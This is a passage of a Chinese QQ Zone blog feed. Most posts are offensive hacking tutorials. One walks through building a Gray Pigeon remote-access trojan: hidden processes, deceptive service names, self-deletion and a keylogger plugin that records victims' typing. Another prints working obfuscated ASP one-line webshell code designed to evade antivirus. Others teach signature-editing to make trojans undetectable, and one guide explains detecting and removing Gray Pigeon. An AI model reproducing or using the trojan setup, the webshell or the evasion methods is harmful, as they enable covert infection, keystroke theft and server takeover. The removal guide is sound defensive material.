href="http://www.77169.com/LOGO/UploadAdPic/200712/hgz/index.html" target="_blank"><span style="color:#0000ff;line-height:1.8em;">鸽子</span><wbr /></a><wbr />服务器后的图标，大家可以随便选。哪个比较容易欺骗用哪个，呵呵 <br>　　下面的三个选项比较重要，但都不影响<a href="http://www.77169.com/LOGO/UploadAdPic/200712/hgz/index.html" target="_blank"><span style="color:#0000ff;line-height:1.8em;">鸽子</span><wbr /></a><wbr />上线： <br>　　1. 程序安装后提示安装成功，这个你自己测试时选上，可以用，但让别人运行时就不要选了。 <br>　　2. 安装成功后自动删除安装文件，这个就是运行成功后自动删除原文件的功能，一般都选的，大家自己看吧，不影响。 <br>　　3. 运行时在任务栏显示图标，一般都不要，就是像<a href="http://hack.77169.com/List/List_42.html" target="_blank"><span style="color:#0000ff;line-height:1.8em;">QQ</span><wbr /></a><wbr />一样下面显示运行了一个灰<a href="http://www.77169.com/LOGO/UploadAdPic/200712/hgz/index.html" target="_blank"><span style="color:#0000ff;line-height:1.8em;">鸽子</span><wbr /></a><wbr />。。。 <br>　　看上面第三个选项： <br>                                  <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411192150.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411192150.jpg" target="_blank"><img style="width:357px;height:261px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411192150.jpg" /></a><wbr /></a><wbr /> <br>　　这些所有个<a href="http://www.77169.com/LOGO/UploadAdPic/200712/hgz/index.html" target="_blank"><span style="color:#0000ff;line-height:1.8em;">鸽子</span><wbr /></a><wbr />上线都没关系，主要就是些信息，大家自己改一下显示名称，服务名称，描述信息，这些改改主要起到欺骗的作用。 <br>　　WIN98/2000/xp下写入注册表启动项，他主要是写入一个键值，让<a href="http://www.77169.com/LOGO/UploadAdPic/200712/hgz/index.html" target="_blank"><span style="color:#0000ff;line-height:1.8em;">鸽子</span><wbr /></a><wbr />开机自动启动的。选不选都行 <br>　　Win2000/xp下优先启动，这个无所谓了，看意思一看就懂，看个人爱好了。 <br>　　看第四个选项，代理，不填。。。 <br>　　第五个高级选项： <br>                               <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411203305.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411203305.jpg" target="_blank"><img style="width:381px;height:226px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411203305.jpg" /></a><wbr /></a><wbr /> <br>　　使用IEXPLORE.exe进程启动服务端程序，就是载入IE启动<a href="http://www.77169.com/LOGO/UploadAdPic/200712/hgz/index.html" target="_blank"><span style="color:#0000ff;line-height:1.8em;">鸽子</span><wbr /></a><wbr /> <br>　　隐藏服务端进程，这个就选上吧，不然在肉鸡的进程里可以看到我们的<a href="http://www.77169.com/LOGO/UploadAdPic/200712/hgz/index.html" target="_blank"><span style="color:#0000ff;line-height:1.8em;">鸽子</span><wbr /></a><wbr />。。 <br>　　点你的<a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411213653.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411213653.jpg" target="_blank"><img style="width:396px;height:64px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411213653.jpg" /></a><wbr /></a><wbr /> <br>　　到现在为止，你的鸽子就可以抓鸡了，下面的没有做会上线的朋友们，可以先不用看了，能上线是最主要的，点生成服务器，找到你生成鸽子的路径，自己运行吧试试，看呢能上线吗? 。放心，没做免杀的<a href="http://www.77169.com/LOGO/UploadAdPic/200712/hgz/index.html" target="_blank"><span style="color:#0000ff;line-height:1.8em;">鸽子</span><wbr /></a><wbr />是经不起杀软的查杀的，2分钟杀毒就杀了 呵呵 <br>　　看图，自动上线主机，看有没， <br>                              <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411224593.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411224593.jpg" target="_blank"><img style="width:245px;height:324px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411224593.jpg" /></a><wbr /></a><wbr /> <br>　　上面成功后讲最后一个插件功能，这个可重要了，大家记录键盘就靠它了，首先在我们的群共享里下载这个： 键盘记录插件，这个就五个字形容，很小很强大，唯一缺点就是得自己做免杀。。。，下载下来，随便找个地方解压缩，然后打开我们的插件功能 <br>                                 <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411241537.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411241537.jpg" target="_blank"><img style="width:377px;height:260px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411241537.jpg" /></a><wbr /></a><wbr /> <br>　　大家看到增加前面的小方框了没?点他选择你刚才加压缩的插件 <br>                            <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411252500.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411252500.jpg" target="_blank"><img style="width:385px;height:136px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411252500.jpg" /></a><wbr /></a><wbr /> <br>　　点增加，然后选择领一个插件： <br>                <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411271572.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411271572.jpg" target="_blank"><img style="width:415px;height:116px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411271572.jpg" /></a><wbr /></a><wbr /> <br>        好了，加入插件了 <br>                           <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411283350.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411283350.jpg" target="_blank"><img style="width:354px;height:266px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411283350.jpg" /></a><wbr /></a><wbr /> <br>　　点生成吧，下面介绍插件的使用方法： <br>　　运行<a href="http://www.77169.com/LOGO/UploadAdPic/200712/hgz/index.html" target="_blank"><span style="color:#0000ff;line-height:1.8em;">鸽子</span><wbr /></a><wbr />后， <br>                                            <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411295301.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411295301.jpg" target="_blank"><img style="width:202px;height:284px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411295301.jpg" /></a><wbr /></a><wbr /> <br>　　选择你刚主机，然后点远程控制命令，入图 <br>                                        <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411313929.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411313929.jpg" target="_blank"><img style="width:252px;height:282px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411313929.jpg" /></a><wbr /></a><wbr /> <br>　　进入后：看插件管理如图，看到没，点他 <br>                      <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411325449.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411325449.jpg" target="_blank"><img style="width:427px;height:284px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411325449.jpg" /></a><wbr /></a><wbr /> <br>　　进入插件管理界面 <br>                       <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411335671.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411335671.jpg" target="_blank"><img style="width:431px;height:282px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411335671.jpg" /></a><wbr /></a><wbr /> <br>　　点刷新插件：看到没，出来了 <br>                        <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411350242.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411350242.jpg" target="_blank"><img style="width:421px;height:227px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411350242.jpg" /></a><wbr /></a><wbr /> <br>　　启用是启用插件，停止是停止插件，这个不多说， <br>　　查看插件，如果肉鸡使用键盘了，你点查看插件结果：如图 <br>                         <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411362968.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411362968.jpg" target="_blank"><img style="width:413px;height:147px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411362968.jpg" /></a><wbr /></a><wbr /> <br>　　看到没，记录下来了，使用了IE 进入了www.163.com网站，然后又输入了些数字和字母，点了回车，呵呵，我乱打的，知道了吧，很小很强大。 <br>　　中文一样能记录，看我给<a href="http://hack.77169.com/List/List_42.html" target="_blank"><span style="color:#0000ff;line-height:1.8em;">QQ</span><wbr /></a><wbr />发送的 <br>                         <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411373892.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411373892.jpg" target="_blank"><img style="width:422px;height:144px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411373892.jpg" /></a><wbr /></a><wbr /> <br>　　一样可以记录。 <br>　　还有几个插件我没传，用法一样，只是功能很无聊，打开关闭光驱了，锁定键盘鼠标了，很无聊了 想要的群里说一声，我传给大家。 <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[648618852@qq.com(暗小子)]]></author>
<comments>http://648618852.qzone.qq.com/blog/1233742913#comment</comments>
<qz:effect>142606931</qz:effect>
<pubDate>Wed, 04 Feb 2009 10:21:53 GMT</pubDate>
<guid>http://648618852.qzone.qq.com/blog/1233742913</guid>
</item>

<item>
<title><![CDATA[经典一句话Asp木马加密]]></title>
<link>http://648618852.qzone.qq.com/blog/1232024673</link>
<description><![CDATA[不知道怎样表达清楚。看例子吧：  <br><br><br><span style="line-height:1.8em;">&lt;script language=vbs runat=server&gt;   <br>Execute(HextoStr(&quot;65786563757465287265717565737428636872283335292929&quot;))  <br>Function HextoStr(data)  <br>HextoStr=&quot;EXECUTE &quot;&quot;&quot;&quot;&quot;  <br>C=&quot;&amp;CHR(&amp;H&quot;  <br>N=&quot;)&quot;  <br><br>   <br>Do While Len(data)&gt;1   <br>If IsNumeric(Left(data,1)) Then   <br>HextoStr=HextoStr&amp;C&amp;Left(data,2)&amp;N   <br>data=Mid(data,3)   <br>Else   <br>HextoStr=HextoStr&amp;C&amp;Left(data,4)&amp;N   <br>data=Mid(data,5)   <br>End If   <br>Loop   <br>End Function   <br>&lt;/script&gt;   <br>&lt;SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT&gt;eval(String.fromCharCode(   <br>116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))&lt;/SCRIPt&gt;    </span><wbr /><br><br>    不过加密后就不是一句话了，哈哈。这个s端用海阳或冰狐都可以连得上的，密码是#。   <br><br>    其实只是换写了&lt;script language=vbs runat=server&gt; 这种方式，里边的代码可以用js或vbs等多种加密方式来加密解密了，省得asp只有微软的那个东东可以加密，同时省去了asp里的%号而已。当然不加密也可以，调用&lt;script language=vbs runat=server&gt;那还是一句话，加密主要是为了躲过杀毒软件。 <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[648618852@qq.com(暗小子)]]></author>
<comments>http://648618852.qzone.qq.com/blog/1232024673#comment</comments>
<qz:effect>142606930</qz:effect>
<pubDate>Thu, 15 Jan 2009 13:04:33 GMT</pubDate>
<guid>http://648618852.qzone.qq.com/blog/1232024673</guid>
</item>

<item>
<title><![CDATA[制作免杀的ASP网页木马]]></title>
<link>http://648618852.qzone.qq.com/blog/1227567530</link>
<description><![CDATA[<span style="font-size:32px;line-height:1.8em;"><span style="font-size:16px;line-height:1.8em;">2005年是免杀技术突飞猛进的一年，越来越多的人熟悉了简单的PE文件免杀操作。而杀毒软件也是在查杀方面下足了功夫，使得修改文件变得越来越困难。但是，无论定位和修改多么麻烦，只要杀软利用的是特征码扫描，PE文件就可以通过相对简单的特征码修改达到免杀。而CCL一直没有涉足的方面是脚本免杀，坛里也有朋友让我改进一下，因此最近给CCL加上了定位脚本特征码的功能，并对一款asp木马进行了测试，结果怎么样呢？ <br>    这里我选择了海阳顶端网ASP木马2006版。由于并不知道杀软是怎样定义脚本文件的特征码，所以我的操作与定位PE文件相同。杀软仍用大名鼎鼎Kaspersky。先查一下吧，卡巴报警发现Backdoor.ASP.Ace.aw。注意末尾的aw，这是杀软对同一个文件不同版本的特征码定义，有时我们需要运用定位过程中版本号的变化来确定特征码的位置。 <br>    首先假设将特征码定位器CCL设置成手动定位，生成文件200个，打开海洋的木马主文件2006.asp。这时弹出了定位范围选择窗口，由于脚本文件不是PE文件，因此没有分段，整个文件就是一个整体。如图1所示，段名为整个文件，段大小就是整个文件的大小。 <br><wbr /><a href="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=a703d3e3753de44a8054bdfcd5c2840d3d5b74f7339a404e54f1689616e0b6dbdaddb6f9b529e5913d5429794eded329698f99780943218475efdf4acb35ff259a4deaa136b895027bdfd04a858fdbc9b86d95cd" target="_blank"><img style="border:0;" src="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=a703d3e3753de44a8054bdfcd5c2840d3d5b74f7339a404e54f1689616e0b6dbdaddb6f9b529e5913d5429794eded329698f99780943218475efdf4acb35ff259a4deaa136b895027bdfd04a858fdbc9b86d95cd" /></a><wbr /> <br>screen.width-333)this.width=screen.width-333&quot; border=0&gt; <br><br>    直接点确定，对整个文件进行定位。生成文件完毕后对目标进行查杀，结果，只剩下一个文件没有被杀，OUT_00000000_000001C3，这说明当从偏移0开始1C3个字节的数据被填0时，该文件免杀。我们看一下这里是什么。 <br>代码: <br><wbr /><a href="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=a703d3e3753de44a8054bdfcd5c2840d51fb08a53f6e6a624d2939ab7fa43a2b4b8995024534a8061811e516a8ea771af9fadcec0a410a11bd3be9f3696db477b4dc2177604cd33d497dd2276a3db84614f91419" target="_blank"><img style="border:0;" src="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=a703d3e3753de44a8054bdfcd5c2840d51fb08a53f6e6a624d2939ab7fa43a2b4b8995024534a8061811e516a8ea771af9fadcec0a410a11bd3be9f3696db477b4dc2177604cd33d497dd2276a3db84614f91419" /></a><wbr /> <br><br>javascript</span><wbr />:resizepic(this) border=0&gt; <br>    我们将“文件上传成功”改为“上传成功”，保存后再检测。OK，免杀成功了。运行一下试试，海洋的各项功能正常。当然，文件上传成功后的提示已经变了。如图2。 <br><br><wbr /><a href="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=a703d3e3753de44a8054bdfcd5c2840dbd361f1886596f464b7cca94abdd3441f284d13080a7d3137dbf943ada49547169b89b4dc90910a85ca36f9c34946c67bb7ccebc7e53ecef07c27d17324d07e7727047f0" target="_blank"><img style="border:0;" src="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=a703d3e3753de44a8054bdfcd5c2840dbd361f1886596f464b7cca94abdd3441f284d13080a7d3137dbf943ada49547169b89b4dc90910a85ca36f9c34946c67bb7ccebc7e53ecef07c27d17324d07e7727047f0" /></a><wbr /> <br><br>screen.width-333)this.width=screen.width-333&quot; border=0&gt; <br><br><br>    总结一下：卡巴对恶意脚本的定义仍是沿用特征码的方式，且明显没有PE文件的特征码定义那样复杂。希望杀软早日在检测方式上产生根本性的改变！ <br></span><wbr /><br><br><br></span><wbr /></span><wbr /> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[648618852@qq.com(暗小子)]]></author>
<comments>http://648618852.qzone.qq.com/blog/1227567530#comment</comments>
<qz:effect>142606931</qz:effect>
<pubDate>Mon, 24 Nov 2008 22:58:50 GMT</pubDate>
<guid>http://648618852.qzone.qq.com/blog/1227567530</guid>
</item>

<item>
<title><![CDATA[教你清除变种免杀灰鸽子]]></title>
<link>http://648618852.qzone.qq.com/blog/1227567330</link>
<description><![CDATA[<span style="font-size:16px;line-height:1.8em;">你中了灰鸽子《Gray Pigon》,它基于CS模式（客户端服务端）清除有点难。服务端即木马，一般插入Explorer,也有插入IE进程的。杀的时候小心系统崩溃。瑞星有专杀工具。===》</span><wbr /><a href="http://it.rising.com.cn/service/technology/Ravgpk_Download.htm" target="_blank"><span style="color:#003366;font-size:16px;line-height:1.8em;">http://it.rising.com.cn/service/technology/Ravgpk_Download.htm</span><wbr /></a><wbr /><br><span style="font-size:16px;line-height:1.8em;">    我也做过一款客户端，做过内存免杀，再加壳，什么杀毒软件都杀不了（我用过瑞星和卡巴---病毒库都更新过了。）。不要迷信杀毒软件！<br><br></span><wbr /><a href="http://hotkey.tengyi.cn/" target="_blank"><span style="color:#003366;font-size:16px;line-height:1.8em;">http://hotkey.tengyi.cn</span><wbr /></a><wbr /><br><br><span style="font-size:16px;line-height:1.8em;">    最好备份资料重装系统，以后小心！装个还原精灵（如Symantec的一键还原精灵，一般不占用CPU的），或者花点钱买个还原卡，定期还原为干净的系统！<br>应该是灰鸽子，参照以下方法试试：<br>灰鸽子2005的特点是“三个隐藏”——隐藏进程、隐藏服务、隐藏病毒文件。灰鸽子2005感染系统后，将自身注册为系统服务，并在同一目录下生成一组（3个）隐藏的病毒文件；病毒文件名可变，但有一定规律。目前为止，我见过的病毒文件均在%WinDir%下；病毒文件名可以是以下三组之一：<br>1、 G_Server.exe，G_Server.dll，G_Server_Hook.dll<br>2、 IExplorer.exe，IExplorer.dll,，IExplorer_Hook.dll<br>3、 Winlogon.exe，Winlogon.dll，Winlogon_Hook.dll<br>病毒文件名的命名规律是：X.exe，X.dll，X_Hook.dll，其中“X”指文件名的变化部分。在WINDOWS模式下，三个病毒文件均为隐藏文件。在“文件夹选项”的“查看”面板中勾选“显示系统文件夹内容”、“显示所有文件及文件夹”两个选项后，在安全模式下才能看到病毒文件。<br><br>清除灰鸽子仍然要在安全模式下操作，主要有两步：1、清除灰鸽子的服务；2删除灰鸽子程序文件。<br><br>    注意：为防止误操作，清除前一定要做好备份。<br><br>由于正常模式下灰鸽子会隐藏自身，因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是：启动计算机，在系统进入Windows启动画面前，按下F8键(或者在启动计算机时按住Ctrl键不放)，在出现的启动选项菜单中，选择“Safe Mode”或“安全模式”。<br><br>1、由于灰鸽子的文件本身具有隐藏属性，因此要设置Windows显示所有文件。打开“我的电脑”，选择菜单“工具”—》“文件夹选项”，点击“查看”，取消 “隐藏受保护的操作系统文件”前的对勾，并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”，然后点击“确定”。<br><br>2、打开Windows的“搜索文件”，文件名称输入“_hook.dll”，搜索位置选择Windows的安装目录（默认98/xp为C:\windows，2k/NT为C:\Winnt）。 <br><br>3、经过搜索，我们在Windows目录（不包含子目录）下看是否有一个名为IEXPLORE_Hook.dll（也可能是其他名称，但基本结构都是_hook.dll的）的文件。<br><br>4、根据灰鸽子原理分析我们知道，如果IEXPLORE_Hook.DLL是灰鸽子的文件，则在操作系统安装目录下还会有IEXPLORE.exe和 IEXPLORE.dll文件。打开Windows目录，应该还有一个用于记录键盘操作的IEXPLOREKey.dll文件。<br><br>经过这几步操作我们基本就可以确定这些文件是灰鸽子木马了，下面就可以进行手动清除<br><br>灰鸽子的手工清除<br><br>一、清除灰鸽子的服务<br><br>2000／XP系统：<br><br>1、打开注册表编辑器（点击“开始”－》“运行”，输入“Regedit.exe”，确定。），打开 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项。<br><br>2、点击菜单“编辑”－》“查找”，“查找目标”输入“IEXPLORE.exe”，点击确定，我们就可以找到灰鸽子的服务项（此例为IEXPLORE_Server）。<br><br>3、删除整个IEXPLORE_Server项。<br><br>98／me系统：<br><br>在9X 下，灰鸽子启动项只有一个，因此清除更为简单。运行注册表编辑器，打开HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Run项，我们立即看到名为IEXPLORE.exe的一项，将IEXPLORE.exe项删除即可。<br><br>二、删除灰鸽子程序文件<br><br>删除灰鸽子程序文件非常简单，只需要在安全模式下删除Windows目录下的IEXPLORE.exe、IEXPLORE.dll、IEXPLORE_Hook.dll以及IEXPLORE.dll文件，然后重新启动计算机。至此，灰鸽子已经被清除干净。 <br>回答者：blade_jie - 助理 二级 11-14 13:27<br><br>--------------------------------------------------------------------------------<br><br>瑞星2005新版杀毒软件可杀。 <br>回答者：lijiangjun - 举人 四级 11-14 22:13<br><br>--------------------------------------------------------------------------------<br><br>你中的是灰鸽子，麻烦大了。 <br>回答者：HowgoO - 试用期 一级 11-16 09:49<br><br>--------------------------------------------------------------------------------<br><br>是中了灰鸽子 <br>回答者：sdll木雨人 - 助理 二级 11-16 13:16<br><br>--------------------------------------------------------------------------------<br><br>进去下载个清除工具：<br></span><wbr /><a href="http://www.f1-auto.com/secound/third/four/index_v_virusquest2_backdoor_Gpigeon.html" target="_blank"><span style="color:#003366;font-size:16px;line-height:1.8em;">http://www.f1-auto.com/secound/t ... ckdoor_Gpigeon.html</span><wbr /></a><wbr /><span style="font-size:16px;line-height:1.8em;"> <br>回答者：XV流量动力 - 高级魔法师 七级 11-16 13:56<br><br>--------------------------------------------------------------------------------<br><br>灰鸽子 Vip 2005 清除器<br></span><wbr /><a href="http://www.cert.org.cn/articles/tools/common/2005051322256.shtml" target="_blank"><span style="color:#003366;font-size:16px;line-height:1.8em;">http://www.cert.org.cn/articles/tools/common/2005051322256.shtml</span><wbr /></a><wbr /><br><span style="font-size:16px;line-height:1.8em;">BlackHole&amp;灰鸽子后门专杀工具<br></span><wbr /><a href="http://www.cert.org.cn/articles/tools/common/2005051322256.shtml" target="_blank"><span style="color:#003366;font-size:16px;line-height:1.8em;">http://www.cert.org.cn/articles/tools/common/2005051322256.shtml</span><wbr /></a><wbr /><br><span style="font-size:16px;line-height:1.8em;">如果专杀工具没有发现灰鸽子，请参考下面方法手工删除：<br>按照下面指导,3步就能彻底删除系统里的灰鸽子木马<br>1. 下载HijackThis扫描系统:<br>汉化版 <br></span><wbr /><a href="http://www.skycn.com/soft/15753.html" target="_blank"><span style="color:#003366;font-size:16px;line-height:1.8em;">http://www.skycn.com/soft/15753.html</span><wbr /></a><wbr /><br><br><span style="font-size:16px;line-height:1.8em;">2. 从HijackThis日志的 O23项可以发现灰鸽子自的服务项<br><br>如最近流行的: <br>O23 - Service: SYSTEM$ (SYSTEM$Server) - Unknown owner - C:\WINDOWS\setemy.bat<br>O23 - Service: Network Connections Manager (NetConMan) - Unknown owner - C:\WINDOWS\uinstall.exe<br>O23 - Service: winServer - Unknown owner - C:\WINDOWS\winserver.exe<br>O23 - Service: Gray_Pigeon_Server (GrayPigeonServer) - Unknown owner - C:\WINDOWS\G_Server.exe<br><br>用HijackThis选中上面的O23项,然后选择&quot;修复该项&quot;或&quot;Fix checked&quot;</span><wbr /><br><span style="font-size:16px;line-height:1.8em;">3. 用Killbox删除灰鸽子对应的木马文件 可以从这里下载Killbox<br></span><wbr /><a href="http://yncnc.onlinedown.net/soft/37257.htm" target="_blank"><span style="color:#003366;font-size:16px;line-height:1.8em;">http://yncnc.onlinedown.net/soft/37257.htm</span><wbr /></a><wbr /><br><span style="font-size:16px;line-height:1.8em;">直接把文件的路径复制到 Killbox里删除<br>通常都是下面这样的文件 &quot;服务名&quot;具体通过HijackThis判断<br>C:\windows\服务名.dll<br>C:\windows\服务名.exe<br>C:\windows\服务名.bat<br>C:\windows\服务名key.dll<br>C:\windows\服务名_hook.dll<br>C:\windows\服务名_hook2.dll<br><br>举例说明:<br>C:\WINDOWS\setemykey.dll<br>C:\WINDOWS\setemy.dll<br>C:\WINDOWS\setemy.exe<br>C:\WINDOWS\setemy_hook.dll<br>C:\WINDOWS\setemy_hook2.dll<br><br>用Killbox删除那些木马文件,由于文件具有隐藏属性,可能无法直接看到,但Killbox能直接删除. 上面的文件不一定全部存在,如果Killbox提示文件不存在或已经删除就没关系了<br>  <br>灰鸽子的手工检测<br><br>    由于灰鸽子拦截了API调用，在正常模式下木马程序文件和它注册的服务项均被隐藏，也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外，灰鸽子服务端的文件名也是可以自定义的，这都给手工检测带来了一定的困难。<br><br>    但是，通过仔细观察我们发现，对于灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出，无论自定义的服务器端文件名是什么，一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点，我们可以较为准确手工检测出灰鸽子木马。<br><br>    由于正常模式下灰鸽子会隐藏自身，因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是：启动计算机，在系统进入Windows启动画面前，按下F8键(或者在启动计算机时按住Ctrl键不放)，在出现的启动选项菜单中，选择“Safe Mode”或“安全模式”。<br><br>   1、由于灰鸽子的文件本身具有隐藏属性，因此要设置Windows显示所有文件。打开“我的电脑”，选择菜单“工具”—》“文件夹选项”，点击“查看”，取消“隐藏受保护的操作系统文件”前的对勾，并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”，然后点击“确定”。<br><br>   2、打开Windows的“搜索文件”，文件名称输入“_hook.dll”，搜索位置选择Windows的安装目录（默认98/xp为C:\windows，2k/NT为C:\Winnt）。  <br><br>3、经过搜索，我们在Windows目录（不包含子目录）下发现了一个名为Game_Hook.dll的文件。<br><br>4、根据灰鸽子原理分析我们知道，如果Game_Hook.DLL是灰鸽子的文件，则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录，果然有这两个文件，同时还有一个用于记录键盘操作的GameKey.dll文件。<br><br><br>    经过这几步操作我们基本就可以确定这些文件是灰鸽子木马了，下面就可以进行手动清除。另外，如果你发现了瑞星杀毒软件查不到的灰鸽子变种，也欢迎登陆瑞星新病毒上报网站（</span><wbr /><a href="http://up.rising.com.cn/" target="_blank"><span style="color:#003366;font-size:16px;line-height:1.8em;">http://up.rising.com.cn</span><wbr /></a><wbr /><span style="font-size:16px;line-height:1.8em;">）上传样本。<br><br>   灰鸽子的手工清除<br><br>    经过上面的分析，清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作，主要有两步：1、清除灰鸽子的服务；2删除灰鸽子程序文件。<br><br>   注意：为防止误操作，清除前一定要做好备份。<br><br>   一、清除灰鸽子的服务<br><br>   2000／XP系统：<br><br>   1、打开注册表编辑器（点击“开始”－》“运行”，输入“Regedit.exe”，确定。），打开 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项。<br><br>   2、点击菜单“编辑”－》“查找”，“查找目标”输入“game.exe”，点击确定，我们就可以找到灰鸽子的服务项（此例为Game_Server）。<br><br>   3、删除整个Game_Server项。<br><br>   98／me系统：<br><br>    在9X下，灰鸽子启动项只有一个，因此清除更为简单。运行注册表编辑器，打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run项，我们立即看到名为Game.exe的一项，将Game.exe项删除即可。<br><br>   二、删除灰鸽子程序文件<br><br>    删除灰鸽子程序文件非常简单，只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件，然后重新启动计算机。至此，灰鸽子已经被清除干净。<br><br>   小结<br><br>   本文给出了一个手工检测和清除灰鸽子的通用方法，适用于我们看到的大部分灰鸽子木马及其变种，然而仍有极少数变种采用此种方法无法检测和清除。同时，随着灰鸽子新版本的不断推出，作者可能会加入一些新的隐藏方法、防删除手段，手工检测和清除它的难度也会越来越大。当你确定机器中了灰鸽子木马而用本文所述的方法又检测不到时，最好找有经验的朋友帮忙解决。<br><br>   同时随着瑞星杀毒软件2005版产品发布，杀毒软件查杀未知病毒的能力得到了进一步提高。经过瑞星公司研发部门的不断努力，灰鸽子病毒可以被安全有效地自动清除，需要用户手动删除它的机会也将越来越少。</span><wbr /> <br> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[648618852@qq.com(暗小子)]]></author>
<comments>http://648618852.qzone.qq.com/blog/1227567330#comment</comments>
<qz:effect>142606930</qz:effect>
<pubDate>Mon, 24 Nov 2008 22:55:30 GMT</pubDate>
<guid>http://648618852.qzone.qq.com/blog/1227567330</guid>
</item>

<item>
<title><![CDATA[黑客谈免杀 关于特征码修改技术]]></title>
<link>http://648618852.qzone.qq.com/blog/1226786177</link>
<description><![CDATA[<span style="color:#ff0000;font-size:32px;font-family:'华文新魏';line-height:1.8em;">黑客谈免杀 关于特征码修改技术</span><wbr /><br>如果你想学习免杀技术：  <br><br>    1.基础的汇编语言  <br><br>    2.修改工具（不指那些傻瓜式软件）。如：  <br><br>    OllyDbg . PEditor. C32ASM . MYCCL复合特征码定位器。UE .OC. 资源编辑器等。还有一些查壳 脱壳软件（如：PEID RL脱壳机等） . 以下是常用的几种免杀方法及工具：  <br><br>    一、要使一个木马免杀 <br><br>    首先要准备一个不加壳的木马，这点非常重要，否则 免杀操作就不能进行下去。 然后我们要木马的内存免杀，从上面分析可以看出，目前的内存查杀，只有瑞星最强，其它杀毒软件内存查杀现在还不起作用所以我们只针对瑞星的内存查杀，要进行内存特征码的定位和修改，才能内存免杀。  <br><br>    二、对符其它的杀毒软件 <br><br>    比如江民，金山，诺顿，卡巴。我们可以采用下面的方法，或这些方面的组合使用。 <br><br>    1&gt;.入口点加1免杀法。  <br><br>    2&gt;.变化入口地址免杀法  <br><br>    3&gt;.加花指令法免杀法  <br><br>    4&gt;.加壳或加伪装壳免杀法。  <br><br>    5&gt;.打乱壳的头文件免杀法。 <br><br>    6&gt;.修改文件特征码免杀法。  <br><br>    第三部分：免杀技术实例演示部分 <br><br>    一、入口点加1免杀法： <br><br>    